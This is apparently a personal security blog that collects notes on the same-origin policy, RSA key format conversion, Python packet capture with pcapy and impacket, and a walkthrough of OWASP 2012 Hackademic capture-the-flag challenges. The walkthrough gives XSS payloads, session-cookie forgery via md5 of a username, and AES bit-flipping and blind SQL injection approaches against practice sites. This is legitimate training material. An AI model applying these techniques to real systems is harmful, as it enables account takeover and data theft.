Same Origin Policy for Document Object Model

The Same Origin Policy was introduced by Netscape in 1995. It has been implemented by all modern web browsers. Its principle is “Pages from the same site can access each other’s DOM without restriction. But the pages from one site cannot access DOM of pages from other different sites. “The Same Origin Policy provides strict content segregation for different websites to preserve confidentiality and integrity.

The origin is defined by three parts:

• Domain name  (for example, www.example.com)
• Application protocol (for example, http or https)
•  Port number (for example, 80 or 8080)

Two origins are considered same if the values of three parts are exactly same. However, Internet Explorer does not include port number into same origin components.

There are two popular ways to get around “Same Origin Policy”

• Changing document.domain

Two sites sharing a common top-level domain can mutually set their document.domain to the common top-level domain. For example, login.example.com and register.example.com can bypass the restriction by setting their document.domain=example.com. The security concern is that unwanted domains like evil.example.com can join the party by setting their document.domain=example.com.

•  Use postMessage of HTML5

HTML5 provide a new method postMessage for passing data between documents in different domains. All modern web browsers support this new function, which provide a secure way for bypassing Same Origin Policy.

For example,

var framewindow=window.parent.frames["orgFrame"];

framewindow.postMessage(‘this is a test message’), ‘http://www.example.com’);

function receiveMessage(event)

{

            if (event.origin !== "http://example.org") // Make sure to accept messages from trusted domain

                        return;

            //process the received message

}

window.addEventListener("message", receiveMessage, false); // add message handler

Different formats for RSA keys

RSA keys can be saved into different formats: PEM, DER, Microsoft PUBLICKEYBLOB and Microsoft PRIVATEKEYBLOB. It might be challenging to convert the keys from one format to another.

Here is some very helpful information from this post http://pumka.net/2009/12/19/reading-writing-and-converting-rsa-keys-in-pem-der-publickeyblob-and-privatekeyblob-formats/

The keys contain those big numbers used for encryption.

·         Private key contains: modulus, private exponent, public exponent, prime 1, prime 2, exponent 1, exponent 2 and coefficient.

·         Public key contains only modulus and public exponent.

• DER format is based on Abstract Syntax Notation One (ASN.1). You can use ASN.1 Editor to view its structure and contents.
• PEM format from OpenSSL is based64 encoded format of DER format
• PRIVATEKEYBLOB and PUBLICKEYBLOB are C-style structure defined by Microsoft.

OpenSSL is a nice tool to convert the keys from one format to another. Here are some examples:

#convert private key from PEM to DER

openssl.exe rsa -inform PEM -in test.pem -outform DER -out test.der

#convert private key from DER to PEM

openssl.exe rsa -inform DER -in test.DER -outform PEM -out test1.pem

#convert public key from PEM to DER

openssl.exe rsa -inform  PEM -pubin  -in testPub.pem -outform DER -out testPub.der

#convert public key from DER to PEM

openssl.exe rsa -inform  DER -pubin  -in testPub.der -outform PEM -out testPub.pem

#convert public key from PEM to PUBLICKEYBLOB

openssl.exe rsa -inform  "PEM" -pubin  -in testPub.pem -outform "MS\ PUBLICKEYBLOB" -out testPub.pblob

#convert private key from PEM to PRIVATEKEYBLOB

openssl.exe rsa -inform  "PEM"   -in test.pem -outform "MS\ PRIVATEKEYBLOB" -out test.pblob

Here is a python script to convert keys from PEM to DER format:

import base64

fileName="c:\\temp\\testPub.pem"

fileContent=""

with open(fileName, 'r') as f:

    fileContent=f.readlines()

fileContent.pop()

fileContent.pop(0)

s=''.join(fileContent)

s=s.replace('\n','')

data =base64.b64decode(s)

print data.encode('hex')

Use pcapy and impacket to interact with libpcap in Python

I need to read and analyze some TCP packets in Windows Python 2.7. After some google search, I decided to give pcapy and impacket a shot because they are easier to use as shown in http://snipplr.com/view/3579/.

The first step is to install them on my Windows box. I tried easy_install and it stopped due to an error of "not being able to find pcap.h". To fix the problem, I downloaded the latest winpacp developer's pack from http://www.winpcap.org/devel.htm. After unzipping the content to the same directory that cl.exe looks for, everything went well. There is no problem with installing impacket using easy_install.

The second step is to write a simple script to read some TCP packets from one network interface. Here is my readLivePacket.py:

from pcapy import findalldevs,open_live
from impacket import ImpactDecoder, ImpactPacket


devices = findalldevs();
pc = open_live(devices[1], 2048, False, 1000)
pc.setfilter('tcp')

  
def processPacket(hdr, data):
    decoder = ImpactDecoder.EthDecoder()
    packet=decoder.decode(data)
    ippacket=packet.child()
    tcppacket=packet.child()
    print tcppacket
  
packet_limit = -1
pc.loop(packet_limit, processPacket)

Once the script starts, it captured and printed out all TCP packets as shown here.

I also want my script to read and analyze packets from pcap file.  Here is my readPacketFile.py:


from pcapy import findalldevs,open_offline
from impacket import ImpactDecoder, ImpactPacket


fileName="c:\\temp\\rsa\\test.pcap"


pc = open_offline(fileName)
pc.setfilter('tcp')


  
def processPacket(hdr, data):
    decoder = ImpactDecoder.EthDecoder()
    packet=decoder.decode(data)
    ippacket=packet.child()
    tcppacket=packet.child()
    
    print tcppacket
  
packet_limit = -1
pc.loop(packet_limit, processPacket)


pcapy and impacket make the job of analyzing network traffic easy for Python.

OWASP 2012 Online Competition

OWASP 2012 Online Competition starts from 05/01/2012. The details can be found at https://www.hacking-lab.com/user/cases/cases.html?event=284

I spent 8 hours on 05/02/2012 and solved all challenges. Here are my solutions to the challenges:

1. 8018 OWASP Hackademic Challenge 1. There is an unusual element on the source code of the page:   YXBwc2VjX3VzYTp0aGlzZWFz  this is base64 encoding of appsec_usa:thiseas. That's the user name and password for the portal. 
2. 8019 OWASP Hackademic Challenge 2. The goal is to find the password to the website. However, the website hides its password within JavaScript as shown below. I just used FireBug and found the password:   "take a break"

	function GetPassInfo(){
	var madhouuuuuuuseeee = "givesacountinatobp laryk"
	var j = madhouuuuuuuseeee.charAt(1); var h = madhouuuuuuuseeee.charAt(0); var l = madhouuuuuuuseeee.charAt(17);
	var g = madhouuuuuuuseeee.charAt(2); var i = madhouuuuuuuseeee.charAt(6); var x = madhouuuuuuuseeee.charAt(18);
	var l = madhouuuuuuuseeee.charAt(3); var p = madhouuuuuuuseeee.charAt(2); var m = madhouuuuuuuseeee.charAt(20);
	var s = madhouuuuuuuseeee.charAt(17); var k = madhouuuuuuuseeee.charAt(10); var d = madhouuuuuuuseeee.charAt(3);
	var bb = madhouuuuuuuseeee.charAt(6); var d = madhouuuuuuuseeee.charAt(13); var r = madhouuuuuuuseeee.charAt(8);
	var a = madhouuuuuuuseeee.charAt(0); var d = madhouuuuuuuseeee.charAt(3); var r = madhouuuuuuuseeee.charAt(16);
	var b = madhouuuuuuuseeee.charAt(1); var e = madhouuuuuuuseeee.charAt(4); var j = madhouuuuuuuseeee.charAt(9);
	var c = madhouuuuuuuseeee.charAt(2); var f = madhouuuuuuuseeee.charAt(5); var g = madhouuuuuuuseeee.charAt(4);
	var j = madhouuuuuuuseeee.charAt(9); var h = madhouuuuuuuseeee.charAt(6); var l = madhouuuuuuuseeee.charAt(11);
	var g = madhouuuuuuuseeee.charAt(4); var i = madhouuuuuuuseeee.charAt(7); var x = madhouuuuuuuseeee.charAt(21);
	var l = madhouuuuuuuseeee.charAt(11); var p = madhouuuuuuuseeee.charAt(4); var m = madhouuuuuuuseeee.charAt(4);
	var s = madhouuuuuuuseeee.charAt(17); var k = madhouuuuuuuseeee.charAt(10); var d = madhouuuuuuuseeee.charAt(3);
	var t = madhouuuuuuuseeee.charAt(18); var n = madhouuuuuuuseeee.charAt(12); var e = madhouuuuuuuseeee.charAt(4);
	var a = madhouuuuuuuseeee.charAt(0); var o = madhouuuuuuuseeee.charAt(13); var f = madhouuuuuuuseeee.charAt(5);
	var b = madhouuuuuuuseeee.charAt(1); var q = madhouuuuuuuseeee.charAt(15); var h = madhouuuuuuuseeee.charAt(6);
	var c = madhouuuuuuuseeee.charAt(2); var h = madhouuuuuuuseeee.charAt(6); var i = madhouuuuuuuseeee.charAt(7);
	var j = madhouuuuuuuseeee.charAt(9); var i = madhouuuuuuuseeee.charAt(7); var y = madhouuuuuuuseeee.charAt(22);
	var g = madhouuuuuuuseeee.charAt(4); var p = madhouuuuuuuseeee.charAt(4); var yy = madhouuuuuuuseeee.charAt(23);
	var l = madhouuuuuuuseeee.charAt(11); var k = madhouuuuuuuseeee.charAt(10); var bb = madhouuuuuuuseeee.charAt(14);
	var q = madhouuuuuuuseeee.charAt(20); var n = madhouuuuuuuseeee.charAt(12);
	var m = madhouuuuuuuseeee.charAt(4); var o = madhouuuuuuuseeee.charAt(13);
	var p = madhouuuuuuuseeee.charAt(4)
	var Wrong = (bb+""+q+""+yy+""+d+""+t+""+f+""+t+""+r+""+x+""+d+""+f+""+yy)
	if (document.forms[0].Password1.value == Wrong)
	location.href="index.php?Result=" + Wrong;
	}

3. 8020 OWASP Hackademic Challenge 3. The goal is to test XSS issue and generate a alert box with the message of "XSS!". Unfortunately, it seems that the challenge is only a string matching XSS problem. The matching string is  <script> alert('XSS!'); </script>  
4. 8021 OWASP Hackademic Challenge 4. This challenge is just a variation of challenge 3 with same goal. The matching string is:  <script> alert(String.fromCharCode(88,83,83,33)); </script> 
5. 8022 OWASP Hackademic Challenge 5. The goal is to access the hidden content with their special web browser. The answer is to change user agent of web browser:  User-Agent: p0wnBrowser version 2.30
6. 8023 OWASP Hackademic Challenge 6. The goal is to find the password to access the website. The password is hidden into JavaScript again. The JavaScript can be obtained by using Firebug and JavaScriptShell. The password is:  h@ckers!
7. 8024 OWASP Hackademic Challenge 7. The goal is to gain admin access to the website. After spidering the website, I find an interesting file http://hackademics.hacking-lab.com/ch007/index_files/lastlogin.log. Here is its content:

30 31 30 30 31 31 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 31 30 30 31 31 20 30 31 31 31 30 31 30 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 31 31 30 30 20 30 31 31 30 31 31 31 31 20 30 31 31 30 30 31 31 31 20 30 31 31 30 31 30 30 31 20 30 31 31 30 31 31 31 30 20 30 30 31 30 30 30 30 30 20 30 31 31 30 30 30 31 30 20 30 31 31 31 31 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 30 30 30 31 20 30 31 31 30 31 31 30 30 20 30 31 31 30 31 30 30 31 20 30 31 31 30 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 30 31 30 30 30 30 30 20 30 31 30 31 30 30 30 30 20 30 31 31 31 30 30 31 30 20 30 31 31 30 30 31 30 31 20 30 31 31 31 30 31 30 30 20 30 31 31 31 30 31 30 30 20 30 31 31 31 31 30 30 31 20 30 30 31 30 31 31 30 30 20 30 30 31 30 30 30 30 30 20 30 31 31 31 30 31 30 31 20 30 31 31 31 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 31 31 31 30 30 31 30 20 30 31 31 30 31 31 31 30 20 30 31 31 30 30 30 30 31 20 30 31 31 30 31 31 30 31 20 30 31 31 30 30 31 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 30 30 30 31 20 30 31 31 30 31 31 30 30 20 30 31 31 30 31 30 30 31 20 30 31 31 30 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 30 31 30 30 30 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 31 30 31 30 30 20 30 30 31 30 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 31 30 30 20 30 30 31 30 31 31 31 31 20 30 30 31 31 30 30 31 31 20 30 30 31 30 31 31 31 31 20 30 30 31 31 30 30 31 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 30 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 31 30 31 20 30 30 31 31 31 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 30 31 31 30 

   It looks like ASCII code in binary format after changing 30 to 0 and 31 to 1 and 20 to separator. A simple Python script decodes its content as: 

Last Login by: Alice Pretty, username: Alice at 14/3/2011 10:59:00am

        Now, we have an user name "Alice" which can be used to access the website. I noticed that the session id remained same for different sessions of Alice. The session id is 64489c85dc2fe0787b85cd87214b3810.0 The first part looks like md5. 64489c85dc2fe0787b85cd87214b3810=md5(Alice). OK, I just need to generate a new session token for admin. After several attempts, the system accepts this cookie:  e3afed0047b08059d0fada10f400c1e5.1

where md5(Admin) = e3afed0047b08059d0fada10f400c1e5

8. 8025 OWASP Hackademic Challenge 8. The goal is to access the website as admin. The backdoor shell only support these commands: ls,whoami,id,help,su. If su is typed, the shell asks for user name and password. I also noticed that there is an interesting image file found by using "ls" command: http://hackademics.hacking-lab.com/ch008/4admin0Nly.jpg. It is not a normal JPG image file. Its content is:
   2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 55 73 65 72 6e 61 6d 65 3a 20 73 75 70 65 72 61 64 6d 69 6e 20 50 61 73 73 77 6f 72 64 3a 20 30 77 40 73 70 55 53 41 79 30 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
   
   The ascii values of its contents contains:  Username: superadmin Password: 0w@spUSAy0 
9. 8026 OWASP Hackademic Challenge 9. The goal is to gain admin access to the website.
   1) Change the user agent of the browser to use
   2) The shell is accessible from http://hackademics.hacking-lab.com/ch009/y0_man_y0.php
   3) Use "ls" command and find some interesting pages: adminpanel.php, y0_man_y0.php, log.history.php
   4) In the source code of http://hackademics.hacking-lab.com/ch009/log.history.php, there is some interesting comments:
   

   slrig_$$ap_$GN0RTS_4_s1_s1Ht :drowssap nimda :emanresu Decode the comment and reverse the order, I get the following message: 'username: admin password: tH1s_1s_4_STR0NG$_pa$$_girls' 5) Use the above user name and password to log in the admin panel page. 8027 OWASP Hackademic Challenge 10. The goal is to gain access to the website. 1) There is a hidden field called LetMeIn=False. I changed it LetMeIn=True and accessed the website. 2) The alert function looks like alert("01010011 01100101 01110010 01101001 01100001 01101100 00100000 01001110 01110101 01101101 01100010 01100101 01110010 00111010 00100000 01010100 01001000 01001001 01010011 00101101 01001001 01010011 01001111 01000100 01000100 00101101 01000011 01000001 01010101 01010011 01000101 00101101 01001001 01000001 01001101 01000001 00101101 01010011 01010101 01010000 01000001 00101101 01001000 01000001 01000011 01001011 01000001 ") A simple python script can decode this as  THIS-ISODD-CAUSE-IAMA-SUPA-HACKA 3) Enter this code and mission accomplished.  7019 AES Bit-Flipping Attack. The goal is to regenerate a valid ticket based on an expired AES CBC encrypted ticket: B60086CD1E68CEF25BC1BEC429D8F3C01D45F0196331DA5012B99067A25463A493CCBF690FD88F850BD5273C5A7D72B6 1) Burp is a perfect tool to automate this attack. Burp Intrude has bit flipper built-in. 2) There are lots of valid tickets generated by Burp. One example is: 60086CD1E68CEF25BC1BEC429D8F3C01D45F0196331DA5012B99063A25463A493CCBF690FD88F850BD5273C5A7D72B6 And here is the result from server: Hello hacker10 (email: You've logged-in successfully Ticket valid until: 20141011 Solution code: X678RWER_HAXXOR  2312 Blind SQL injection. The goal is to write a small program to read the email address of the customer  “Franziska Knobel”  through blind SQL injection. 1) The email address is  hacker30@hack.er 2) This python script was written in short time just for solve the problem as soon as possible: 2313 Time Based Blind SQL Injection. The goal is to write a small program to read the phone number of"Sandra Fischer” using time based blind SQL Injection. 1) The phone number is  07254455882 2) This python script was written in short time just for solve the problem as soon as possible.